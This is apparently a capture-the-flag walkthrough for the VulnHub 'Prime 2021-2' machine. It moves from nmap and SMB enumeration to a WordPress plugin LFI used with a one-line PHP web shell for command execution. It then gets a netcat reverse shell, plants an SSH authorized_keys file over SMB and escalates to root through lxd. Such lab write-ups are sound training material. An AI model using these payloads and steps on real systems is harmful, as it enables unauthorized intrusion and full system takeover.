https://www.vulnhub.com/entry/prime-2021-2,696/
Scan ports.
# Nmap 7.91 scan initiated Wed May 12 17:59:43 2021 as: nmap -sV -sC -p- -oN ports.log 192.168.33.139
Nmap scan report for 192.168.33.139 (192.168.33.139)
Host is up (0.0041s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Ubuntu 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 0a:16:3f:c8:1a:7d:ff:f5:7a:66:05:63:76:7c:5a:95 (RSA)
| 256 7f:47:44:cc:d1:c4:b7:54:de:4f:27:f2:39:38:ff:6e (ECDSA)
|_ 256 f5:d3:36:44:43:40:3d:11:9b:d1:a6:24:9f:99:93:f7 (ED25519)
80/tcp open http Apache httpd 2.4.46 ((Ubuntu))
|_http-server-header: Apache/2.4.46 (Ubuntu)
|_http-title: HackerCTF
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
10123/tcp open http SimpleHTTPServer 0.6 (Python 3.9.4)
|_http-server-header: SimpleHTTP/0.6 Python/3.9.4
|_http-title: Directory listing for /
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: 7h59m59s
|_nbstat: NetBIOS name: HACKERCTFLAB, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-05-12T18:00:05
|_ start_date: N/A
Check smb share folders.
smbclient -L 192.168.33.139 fish-0 | 130 [08:45:41]
Enter WORKGROUP\kali's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
welcome Disk Welcome to Hackerctf LAB
IPC$ IPC IPC Service (hackerctflab server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
Found shell.php in /upload.
smbclient '\\\\192.168.33.139\\welcome' fish-0 | 1 [08:47:16]
Enter WORKGROUP\kali's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu May 13 04:27:52 2021
.. D 0 Sat May 8 02:38:58 2021
.mysql_history H 18 Sat May 8 15:05:03 2021
.ssh DH 0 Thu May 13 04:29:18 2021
.profile H 807 Sat Mar 20 00:02:58 2021
upload D 0 Sun May 9 19:19:02 2021
.sudo_as_admin_successful H 0 Sat May 8 13:34:48 2021
.bash_logout H 220 Sat Mar 20 00:02:58 2021
.cache DH 0 Sat May 8 02:39:15 2021
something N 82 Sat May 8 00:18:09 2021
secrets N 0 Sat May 8 00:15:17 2021
.bash_history H 72 Sun May 9 19:23:26 2021
.bashrc H 3771 Sat Mar 20 00:02:58 2021
19475088 blocks of size 1024. 9885876 blocks available
smb: \> cd upload
smb: \upload\> dir
. D 0 Sun May 9 19:19:02 2021
.. D 0 Thu May 13 04:27:52 2021
shell.php A 35 Sun May 9 19:19:02 2021
19475088 blocks of size 1024. 9885872 blocks available
smb: \upload\> get shell.php
getting file \upload\shell.php of size 35 as shell.php (6.8 KiloBytes/sec) (average 6.8 KiloBytes/sec)
smb: \upload\>
Check shell.php.
cat shell.php smbclient-0 | 0 [08:48:39]
<?php echo system($_GET['cmd']);?>
Found user name jarves.
cat something fish-0 | 0 [09:29:34]
I wanted to make it my home directory. But idea must be changed.
Thanks,
jarves
Scan folders of port 80.
cat 80.log fish-0 | 0 [09:30:32]
/css (Status: 301) [Size: 314] [--> http://192.168.33.139/css/]
/server (Status: 301) [Size: 317] [--> http://192.168.33.139/server/]
/wp (Status: 301) [Size: 313] [--> http://192.168.33.139/wp/]
/index.html (Status: 200) [Size: 5761]
/images (Status: 301) [Size: 317] [--> http://192.168.33.139/images/]
/javascript (Status: 301) [Size: 321] [--> http://192.168.33.139/javascript/]
Check vulnerability of wordpress, found 1 user and 1 vulnerable plugin.
wpscan --url http://192.168.33.139/wp/ -e u,ap --no-banner --api-token yourtoken --force --plugins-detection aggressive
...
[+] gracemedia-media-player
| Location: http://192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/
| Latest Version: 1.0 (up to date)
| Last Updated: 2013-07-21T15:09:00.000Z
| Readme: http://192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/readme.txt
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/, status: 200
|
| [!] 1 vulnerability identified:
|
| [!] Title: GraceMedia Media Player 1.0 - Local File Inclusion (LFI)
| References:
| - https://wpscan.com/vulnerability/a4f5b10f-3386-45cc-9548-dd7bbea199d6
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618
| - https://www.exploit-db.com/exploits/46537/
| - https://seclists.org/fulldisclosure/2019/Mar/26
...
[i] User(s) Identified:
[+] admin
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
The plugin has LFI vulnerability.
searchsploit gracemedia
------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------- ---------------------------------
WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion | php/webapps/46537.txt
------------------------------------------------------------------------------------- ---------------------------------
Check if LFI works.
curl '192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds
&cfg=../../../../../../../../../../etc/passwd'
root:x:0:0:root:/root:/bin/bash
...
jarves:x:1000:1000:jarves:/home/jarves:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
...
Check if LFI works.
curl '192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home/jarves/upload/shell.php&cmd=id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)⏎
Visit the following address.
Get reverse shell.
nc -nlvp 1234 ifconfig-0 | 0 [08:50:29]
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.33.139.
Ncat: Connection from 192.168.33.139:49084.
bash: cannot set terminal process group (971): Inappropriate ioctl for device
bash: no job control in this shell
<t/plugins/gracemedia-media-player/templates/files$
<t/plugins/gracemedia-media-player/templates/files$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Another way to directly get ssh login as jarves is to directly upload authorized_keys through smb.
smbclient '\\\\192.168.33.139\\welcome'
...
smb: \> mkdir .ssh
smb: \> cd .ssh
smb: \.ssh\> put authorized_keys
putting file authorized_keys as \.ssh\authorized_keys (183.9 kb/s) (average 183.9 kb/s)
smb: \.ssh\> chmod 600 authorized_keys
Server doesn't support UNIX CIFS calls.
Check group of jarves.
jarves@hackerctflab:~$ id
uid=1000(jarves) gid=1000(jarves) groups=1000(jarves),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)
Use the classic lxd vulnerability.
lxc image import ./alpine-v3.13-x86_64-20210405_2328.tar.gz --alias myimage
lxd init alpine:v3.12 mypool
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
Now we are root.
jarves@hackerctflab:~$ lxc exec ignite /bin/sh
~ # id
uid=0(root) gid=0(root)
Upload authorized_keys to /root/.ssh, get ssh login directly.
ssh root@192.168.33.139
...
root@hackerctflab:~# id;hostname
uid=0(root) gid=0(root) groups=0(root)
hackerctflab
